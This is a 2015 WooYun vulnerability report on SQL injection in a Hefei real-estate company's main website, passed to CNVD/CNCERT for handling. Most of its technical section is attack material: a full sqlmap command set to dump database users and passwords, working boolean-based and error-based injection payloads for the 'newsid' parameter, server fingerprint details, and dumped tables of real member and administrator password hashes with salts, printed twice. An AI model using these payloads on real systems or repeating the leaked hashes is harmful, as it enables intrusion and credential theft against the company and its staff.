当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158886

漏洞标题:合肥高新股份有限公司主站存在SQL注射漏洞(大量员工密码)

相关厂商:合肥高新股份有限公司

漏洞作者: 路人甲

提交时间:2015-12-08 00:46

修复时间:2016-01-23 15:16

公开时间:2016-01-23 15:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-08: 细节已通知厂商并且等待厂商处理中
2015-12-11: 厂商已经确认,细节仅向厂商公开
2015-12-21: 细节向核心白帽子及相关领域专家公开
2015-12-31: 细节向普通白帽子公开
2016-01-10: 细节向实习白帽子公开
2016-01-23: 细节向公众公开

简要描述:

合肥高新股份有限公司成立于2002年12月,注册资本25.58亿元,房地产开发企业壹级资质,是安徽省产业地产领军企业、合肥国家高新区管委会直属国有控股公司。当前主要从事产业地产、工业地产、商业地产、住宅地产的开发、建设、融资、运营和管理,项目涉及产业综合体、产业园区、标准化厂房、总部经济、区域商业中心、精品住宅等多种物业类型。
公司以搭建创新创业平台、培育优势产业集群为使命,开发运营了创新产业园、明珠产业园、信息产业园、科技实业园、机电产业园、中试科技园、光机电一体化园、留学生创业园、新材料园、创意孵化基地等11个产业园区,总运营面积达300万平米,成功引进或培育了600多家企业,形成了10多个多产业集群,成为合肥市实施“大众创业、万众创新”的重要平台和载体。同时,秉承立足高新区、建设高新区、服务高新区的宗旨,投资建设了望园别墅、梦园小区、中央华庭、和一花园、长宁家园、蜀山新天地等商住项目,环东小区、兴园小区、蜀南庭院、惠民新村、柏堰雅苑等复建安置小区,以及创新公寓、皖水公寓、明珠公寓等公租房项目,总建筑面积约260万平方米,完善了高新区的城市功能配套;承担了黄山路以南、312国道以北的路网建设,建成通车了望江西路(东段)、科学大道、香樟大道、玉兰大道(南段)、枫林路等主次干线道路20多条,助推高新区建成区形成四通八达的路网格局。
搭建创新创业平台誓做千里马,培育特色产业集群争当领头羊。我们将在社会各界朋友的关心支持下,继续秉承“以创业谋发展、以服务树品牌、以效益求生存”的经营理念,筑巢引凤,筑梦未来,努力发展成为在国内具有影响力的产业地产专业运营商。

详细说明:

地址:http://**.**.**.**/show.php?id=3&newsid=1280

$ python sqlmap.py -u "http://**.**.**.**/show.php?id=3&newsid=1280" -p newsid --technique=BE --output-dir=output --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass


Database: hfgx_new
Table: pcms_member
[27 entries]
+----------------------------------+----------------------------------+
| password                         | randpass                         |
+----------------------------------+----------------------------------+
| 0f8fad117740dc78cb2e834068b94fab | LrMBTZNsd2Ba2o7fCXQ6cqqM8p1Kncam |
| 0f8fad117740dc78cb2e834068b94fab |                                  |
| 11eec3c6677003e160b1bb1ae0ae8a54 | rrRIflC2PmDzHwkn4fk6BG1MdOkdGdwG |
| 14e1b600b1fd579f47433b88e8d85291 | oC4ZdWpZGPBRjfwtyLs8kWBOWe7aLtso |
| 1a1cbf85365b98641de5c1dc32067826 | 7DbjqKzCdINkXmXX5o9nKWtPnyPlacKQ |
| 432176792ef85ce74b48a5d33cc32c77 | Ft8ZuSg9HLfvNyP90392XTqwe5iKDPRG |
| 4a6629303c679cfa6a5a81433743e52c | ryvKw9FOxlnMNHeHEKHbLDp8q04HRIHg |
| 4a6629303c679cfa6a5a81433743e52c | 6yNQLenZlXuU99MLITXa0yMvQLhNS2Gc |
| 4a6629303c679cfa6a5a81433743e52c | XQmHRygQuh2KdQjKhoB7n6cVB4ANEpvM |
| 4a6629303c679cfa6a5a81433743e52c | CJwqwhCNZkKc65CaZdzW5ontE3mofvVt |
| 4a6629303c679cfa6a5a81433743e52c | zeMYMBDBA0SQEWIdUWYuJNt3pjUR21ay |
| 4a6629303c679cfa6a5a81433743e52c | 0VcR0GQFvkTlm8lhhaQEwZ5KGJOdY9z2 |
| 4a6629303c679cfa6a5a81433743e52c |                                  |
| 4a6629303c679cfa6a5a81433743e52c | OKeNbSyg7H0oS6lE31YbMekL8RnZFXzJ |
| 4a6629303c679cfa6a5a81433743e52c | n5cZSJOnxsY2pAea05eTir20T8XT0KJO |
| 4a6629303c679cfa6a5a81433743e52c | xB8xw7Wrx5lAyEsyPenVcErEWH6ZAyHe |
| 5554e863c26270fa2fd37a0ae047828d | FxzxWaFFjMmGbJhV6HfSaDkylHrthSGC |
| 75a1a52c1eb3c9b2f84e648acccdd078 | kupbYvli0TQZZA8XiZEvONW2ZyZT8nZZ |
| 771e19a0d23a9bb190b6cd87c38fde36 | y7eCxg2PFJCmstWomfsA4gEqSU7LD3He |
| 8cb97fcf78b7cb55009d9bc05776174b | zqPy7BKfdfJWH4BBSzym1ti79A1bOcIw |
| 9364a8cbe5f6baf462f722a5e931370b | HgHVCLzPBw2iahDYuiLmKxhRO3E8TpuO |
| 9aabb57322367fb8a35df8092976665b | uvIPjCpfOpVioHQbi8f9zUJ7sOv7evot |
| a10f0956826c880d7f3468dd35738df4 | jMgrxa6yoVbXieM5oE2EREvF14nJLkiu |
| a31fbaee4b19d8605ac1d2f97e41d575 | QuNu7P4m7lnjNRQhKE9RFNQAzINmhCon |
| b75c90259f4c2ab3840aaa4809710995 | vPIFICH9d7NZI0hkcjTySOjwGnG4WKM8 |
| e37ae569060833211324cc6429e31c87 | IHQOnR5XebIdksTcfCxZhXEKbQRzvYxb |
| f74af07399d9d0d2d3cf31f9fde226c0 | F4tmz4IMSYfTkFbUgF2TyMlgdWIc3K6B |
+----------------------------------+----------------------------------+
Database: hfgx_new
Table: pcms_admin
[3 entries]
+----------------------------------+----------------------------------+
| password                         | randpass                         |
+----------------------------------+----------------------------------+
| 7b8e570f29f31ce28c151b96d5ae971e | C0EbFugfkXZbLjANsRMrCyjLifWZEsA4 |
| dfc68961c3209e38d1bc51859b060a2b | cM7gB3PzGLNwzxJEoO4pIV4IGtnsO3uI |
| fb469d7ef430b0baf0cab6c436e70375 | WOhDR5GHzpw0IR1DM5yQ23zl9kH1kGb4 |
+----------------------------------+----------------------------------+

漏洞证明:

---
Parameter: newsid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=3&newsid=1280 AND 7652=7652
    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace
    Payload: id=3&newsid=(SELECT 2716 FROM(SELECT COUNT(*),CONCAT(0x7162627671,(SELECT (ELT(2716=2716,1))),0x716a766a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web server operating system: FreeBSD
web application technology: Apache 2.4.16, PHP 5.6.12
back-end DBMS: MySQL 5.0
current user:    'hfgx@localhost'
current user is DBA:    False
database management system users [1]:
[*] 'hfgx'@'localhost'
Database: hfgx_new
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| pcms_admin                            | 3       |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 941     |
| SESSION_VARIABLES                     | 450     |
| GLOBAL_VARIABLES                      | 436     |
| GLOBAL_STATUS                         | 341     |
| SESSION_STATUS                        | 341     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 219     |
| COLLATIONS                            | 219     |
| PARTITIONS                            | 94      |
| TABLES                                | 94      |
| STATISTICS                            | 48      |
| PLUGINS                               | 42      |
| CHARACTER_SETS                        | 40      |
| INNODB_FT_DEFAULT_STOPWORD            | 36      |
| KEY_COLUMN_USAGE                      | 35      |
| TABLE_CONSTRAINTS                     | 35      |
| SCHEMA_PRIVILEGES                     | 14      |
| ENGINES                               | 9       |
| SCHEMATA                              | 2       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: hfgx_new
Table: pcms_member
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
| randpass | varchar(32)  |
+----------+--------------+
Database: hfgx_new
Table: pcms_admin
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
| randpass | varchar(32)  |
+----------+--------------+
Database: hfgx_new
Table: pcms_member
[27 entries]
+----------------------------------+----------------------------------+
| password                         | randpass                         |
+----------------------------------+----------------------------------+
| 0f8fad117740dc78cb2e834068b94fab | LrMBTZNsd2Ba2o7fCXQ6cqqM8p1Kncam |
| 0f8fad117740dc78cb2e834068b94fab |                                  |
| 11eec3c6677003e160b1bb1ae0ae8a54 | rrRIflC2PmDzHwkn4fk6BG1MdOkdGdwG |
| 14e1b600b1fd579f47433b88e8d85291 | oC4ZdWpZGPBRjfwtyLs8kWBOWe7aLtso |
| 1a1cbf85365b98641de5c1dc32067826 | 7DbjqKzCdINkXmXX5o9nKWtPnyPlacKQ |
| 432176792ef85ce74b48a5d33cc32c77 | Ft8ZuSg9HLfvNyP90392XTqwe5iKDPRG |
| 4a6629303c679cfa6a5a81433743e52c | ryvKw9FOxlnMNHeHEKHbLDp8q04HRIHg |
| 4a6629303c679cfa6a5a81433743e52c | 6yNQLenZlXuU99MLITXa0yMvQLhNS2Gc |
| 4a6629303c679cfa6a5a81433743e52c | XQmHRygQuh2KdQjKhoB7n6cVB4ANEpvM |
| 4a6629303c679cfa6a5a81433743e52c | CJwqwhCNZkKc65CaZdzW5ontE3mofvVt |
| 4a6629303c679cfa6a5a81433743e52c | zeMYMBDBA0SQEWIdUWYuJNt3pjUR21ay |
| 4a6629303c679cfa6a5a81433743e52c | 0VcR0GQFvkTlm8lhhaQEwZ5KGJOdY9z2 |
| 4a6629303c679cfa6a5a81433743e52c |                                  |
| 4a6629303c679cfa6a5a81433743e52c | OKeNbSyg7H0oS6lE31YbMekL8RnZFXzJ |
| 4a6629303c679cfa6a5a81433743e52c | n5cZSJOnxsY2pAea05eTir20T8XT0KJO |
| 4a6629303c679cfa6a5a81433743e52c | xB8xw7Wrx5lAyEsyPenVcErEWH6ZAyHe |
| 5554e863c26270fa2fd37a0ae047828d | FxzxWaFFjMmGbJhV6HfSaDkylHrthSGC |
| 75a1a52c1eb3c9b2f84e648acccdd078 | kupbYvli0TQZZA8XiZEvONW2ZyZT8nZZ |
| 771e19a0d23a9bb190b6cd87c38fde36 | y7eCxg2PFJCmstWomfsA4gEqSU7LD3He |
| 8cb97fcf78b7cb55009d9bc05776174b | zqPy7BKfdfJWH4BBSzym1ti79A1bOcIw |
| 9364a8cbe5f6baf462f722a5e931370b | HgHVCLzPBw2iahDYuiLmKxhRO3E8TpuO |
| 9aabb57322367fb8a35df8092976665b | uvIPjCpfOpVioHQbi8f9zUJ7sOv7evot |
| a10f0956826c880d7f3468dd35738df4 | jMgrxa6yoVbXieM5oE2EREvF14nJLkiu |
| a31fbaee4b19d8605ac1d2f97e41d575 | QuNu7P4m7lnjNRQhKE9RFNQAzINmhCon |
| b75c90259f4c2ab3840aaa4809710995 | vPIFICH9d7NZI0hkcjTySOjwGnG4WKM8 |
| e37ae569060833211324cc6429e31c87 | IHQOnR5XebIdksTcfCxZhXEKbQRzvYxb |
| f74af07399d9d0d2d3cf31f9fde226c0 | F4tmz4IMSYfTkFbUgF2TyMlgdWIc3K6B |
+----------------------------------+----------------------------------+
Database: hfgx_new
Table: pcms_admin
[3 entries]
+----------------------------------+----------------------------------+
| password                         | randpass                         |
+----------------------------------+----------------------------------+
| 7b8e570f29f31ce28c151b96d5ae971e | C0EbFugfkXZbLjANsRMrCyjLifWZEsA4 |
| dfc68961c3209e38d1bc51859b060a2b | cM7gB3PzGLNwzxJEoO4pIV4IGtnsO3uI |
| fb469d7ef430b0baf0cab6c436e70375 | WOhDR5GHzpw0IR1DM5yQ23zl9kH1kGb4 |
+----------------------------------+----------------------------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-11 16:47

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给安徽分中心,由其后续协调网站管理单位处置.

最新状态:

暂无